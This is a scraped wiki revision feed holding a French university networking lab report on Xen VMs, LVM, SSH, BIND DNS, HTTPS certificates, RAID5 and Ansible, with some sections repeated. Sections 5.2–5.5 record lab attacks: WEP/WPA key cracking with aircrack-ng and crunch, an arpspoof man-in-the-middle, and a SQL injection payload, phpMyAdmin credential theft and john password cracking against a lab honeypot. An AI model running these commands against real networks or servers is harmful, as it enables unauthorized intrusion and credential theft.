On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous configurons d'abord nos paramètres DNS dans gandi avant de confgurer la VM. &lt;br /&gt;
&lt;br /&gt;
Dans Glue Records nous ajoutons le namespace et son IP : ns1.stropharia.site / 193.48.57.178&lt;br /&gt;
Dans Name Server nous ajoutons ce DNS et le secondaire :&lt;br /&gt;
ns1.stropharia.site | ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser l'implémentation open-source de DNS bind pour créer une association entre notre nom de domaine et l'IP de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On test alors la configuration :&lt;br /&gt;
 # host -t any stropharia.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases:&lt;br /&gt;
 stropharia.site mail is handled by 42 &lt;br /&gt;
 ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns6.gandi.net.&lt;br /&gt;
 stropharia.site has SOA record ns1.stropharia.site. &lt;br /&gt;
 root.stropharia.site. 13 3600 600 86400 600&lt;br /&gt;
&lt;br /&gt;
On conclue que le DNS est fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
=4.3  Sécurisation de site web par certificat=&lt;br /&gt;
&lt;br /&gt;
Cette section décrit les étapes nécéssaire à la sécurisation par un accès https.&lt;br /&gt;
&lt;br /&gt;
Le résultat est le suivant : &lt;br /&gt;
[[Fichier:https_stropharia.png|400px]]&lt;br /&gt;
&lt;br /&gt;
==Procedure==&lt;br /&gt;
Dans cette partie nous suivons la procédure détaillée de gandi : https://docs.gandi.net/fr/ssl/operations_courantes/csr.html.&lt;br /&gt;
&lt;br /&gt;
Celle-ci consiste à générer les clés avec la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout stropharia.site.key -out stropharia.site.csr&lt;br /&gt;
&lt;br /&gt;
Et de demander à gandi de signer le certificat .csr afin d'obtenir le .crt. On note que le prix annoncé de 12€ passe à 0€ lors du paiement si c'est le premier.&lt;br /&gt;
&lt;br /&gt;
Avant de délivrer le certificat signé gandi doit vérifier que nous possédons bien le nom de domaine. Pour cela une des méthodes possibles est d'envoyer un mail à admin@stropharia.site.&lt;br /&gt;
&lt;br /&gt;
==Configuration du serveur de mail pour la vérification==&lt;br /&gt;
&lt;br /&gt;
Nous utilisons le programme postfix pour la récupération des mails.&lt;br /&gt;
&lt;br /&gt;
Après l'avoir installé nous ajoutons un un alias entre l'utilisateur admin et root afin de recevoir le mail de gandi sur un utilisateur existant.&lt;br /&gt;
&lt;br /&gt;
 #vi /etc/aliases&lt;br /&gt;
 # See man 5 aliases for format&lt;br /&gt;
 postmaster:    root&lt;br /&gt;
 admin:    root&lt;br /&gt;
&lt;br /&gt;
Afin de recevoir les mails nous ajoutons aussi la ligne suivante au fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
&lt;br /&gt;
Pour l'agent de courriel nous utilsons Bsd-mailx :&lt;br /&gt;
 apt-get install -y bsd-mailx #install mailx&lt;br /&gt;
 postalias /etc/aliases # met à jour la base des alias pour prendre en compte admin:root&lt;br /&gt;
 mailx #lancement de la commande pour voir les mails recus&lt;br /&gt;
&lt;br /&gt;
On clique ensuite sur le lien et gandi et entrons le mot de passe de vérification reçu. Peut après on peut télécharger notre .crt ainsi que le fichier GandiStandardSSLCA2.pem.&lt;br /&gt;
&lt;br /&gt;
Finalement on place ces fichiers à coté de notre clé privée dans le répertoire /etc/ssl&lt;br /&gt;
 #ls /etc/ssl | less&lt;br /&gt;
 GandiStandardSSLCA2.pem&lt;br /&gt;
 certs&lt;br /&gt;
 openssl.cnf&lt;br /&gt;
 private&lt;br /&gt;
 stropharia.site.crt&lt;br /&gt;
 stropharia.site.key&lt;br /&gt;
&lt;br /&gt;
==Configuration d'apache2==&lt;br /&gt;
Une fois le CSR signé nous devons configurer apache 2 pour gérer du HTTPS sur le port 443.&lt;br /&gt;
&lt;br /&gt;
On commence par l'installer :&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
puis on active le module ssl :&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le fichier /etc/apache2/sites-enabled/000-default.conf pour rediriger le traffic http du port 80 vers le port 443 :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerName www.stropharia.site&lt;br /&gt;
         '''Redirect / https://www.stropharia.site'''&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/html&lt;br /&gt;
         ...&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et configurer les mots clés SSLCertificateKeyFile, SSLCertificateFile et SSLCertificateChainFile pour la connection sécurisé selon l'énoncé :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost _default_:443&amp;gt;                                                     &lt;br /&gt;
   ServerName www.stropharia.site                                                &lt;br /&gt;
   DocumentRoot /var/www/html                                                    &lt;br /&gt;
   SSLEngine On                                                                  &lt;br /&gt;
   '''SSLCertificateFile''' /etc/ssl/stropharia.site.crt                               &lt;br /&gt;
   '''SSLCertificateKeyFile''' /etc/ssl/stropharia.site.key                            &lt;br /&gt;
   '''SSLCertificateChainFile''' /etc/ssl/GandiStandardSSLCA2.pem&lt;br /&gt;
   SSLVerifyClient None                                                          &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons également un record dans le fichier /etc/bind/db.stropharia.site pour définir www.stropharia.site :&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On rédémarre le service apache&lt;br /&gt;
 service apache2 restart&lt;br /&gt;
et l'on vérifie en allant sur www.stropharia.site que nous somme bien redirigés sur le site https avec un certificat valide. (capture en haut de la section)&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55164</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55164"/>
				<updated>2020-12-22T00:47:44Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration d'apache2 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous configurons d'abord nos paramètres DNS dans gandi avant de confgurer la VM. &lt;br /&gt;
&lt;br /&gt;
Dans Glue Records nous ajoutons le namespace et son IP : ns1.stropharia.site / 193.48.57.178&lt;br /&gt;
Dans Name Server nous ajoutons ce DNS et le secondaire :&lt;br /&gt;
ns1.stropharia.site | ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser l'implémentation open-source de DNS bind pour créer une association entre notre nom de domaine et l'IP de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On test alors la configuration :&lt;br /&gt;
 # host -t any stropharia.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases:&lt;br /&gt;
 stropharia.site mail is handled by 42 &lt;br /&gt;
 ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns6.gandi.net.&lt;br /&gt;
 stropharia.site has SOA record ns1.stropharia.site. &lt;br /&gt;
 root.stropharia.site. 13 3600 600 86400 600&lt;br /&gt;
&lt;br /&gt;
On conclue que le DNS est fonctionne correctement.&lt;br /&gt;
